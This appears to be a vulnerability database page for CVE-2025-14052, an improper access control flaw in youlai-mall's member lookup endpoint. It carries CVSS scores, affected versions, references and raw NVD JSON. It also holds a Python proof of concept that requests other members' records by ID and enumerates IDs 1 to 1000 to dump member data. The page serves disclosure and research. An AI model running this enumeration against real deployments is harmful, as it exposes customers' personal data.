CVE-2025-14052

Description

A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected by this vulnerability is the function getMemberById of the file /mall-ums/app-api/v1/members/. The manipulation of the argument memberId leads to improper access controls. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:* - VULNERABLE

youlai-mall 1.0.0

youlai-mall 2.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-14052 PoC - youlai-mall Improper Access Control
Vulnerability in getMemberById function
"""

import requests
import json

TARGET_URL = "http://target-server/mall-ums/app-api/v1/members/"

def exploit_cve_2025_14052(session_token, target_member_id):
    """
    Exploit the improper access control vulnerability
    
    Args:
        session_token: Valid session token for authenticated user
        target_member_id: Member ID to retrieve information for
    
    Returns:
        dict: Retrieved member information
    """
    headers = {
        "Authorization": f"Bearer {session_token}",
        "Content-Type": "application/json"
    }
    
    # Craft the malicious request
    payload = {
        "memberId": target_member_id
    }
    
    # Send the request to exploit the vulnerability
    response = requests.post(
        TARGET_URL + "getMemberById",
        json=payload,
        headers=headers
    )
    
    if response.status_code == 200:
        return response.json()
    else:
        return {"error": f"Request failed with status {response.status_code}"}

def enumerate_member_ids(session_token, start_id=1, end_id=1000):
    """
    Enumerate and dump all member information
    
    Args:
        session_token: Valid session token
        start_id: Starting member ID
        end_id: Ending member ID
    """
    results = []
    for member_id in range(start_id, end_id + 1):
        member_info = exploit_cve_2025_14052(session_token, member_id)
        if "error" not in member_info:
            results.append(member_info)
            print(f"[*] Dumped member ID {member_id}: {member_info}")
    return results

if __name__ == "__main__":
    # Example usage
    SESSION_TOKEN = "your_session_token_here"
    TARGET_MEMBER_ID = 2
    
    print(f"[*] Exploiting CVE-2025-14052 on {TARGET_URL}")
    result = exploit_cve_2025_14052(SESSION_TOKEN, TARGET_MEMBER_ID)
    print(f"[+] Result: {json.dumps(result, indent=2)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14052/
[4] VulDB https://vuldb.com/cve/CVE-2025-14052
[5] https://github.com/Hwwg/cve/issues/21
[6] https://vuldb.com/?ctiid.334368
[7] https://vuldb.com/?id.334368
[8] https://vuldb.com/?submit.694854

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14052", "sourceIdentifier": "[email protected]", "published": "2025-12-05T00:15:48.233", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected by this vulnerability is the function getMemberById of the file /mall-ums/app-api/v1/members/. The manipulation of the argument memberId leads to improper access controls. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CDAC2C90-64E9-4C14-BDC5-36F1178708EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E843DD0-1FE2-4487-B584-A33F72DDCBDF"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/21", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334368", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334368", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.694854", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}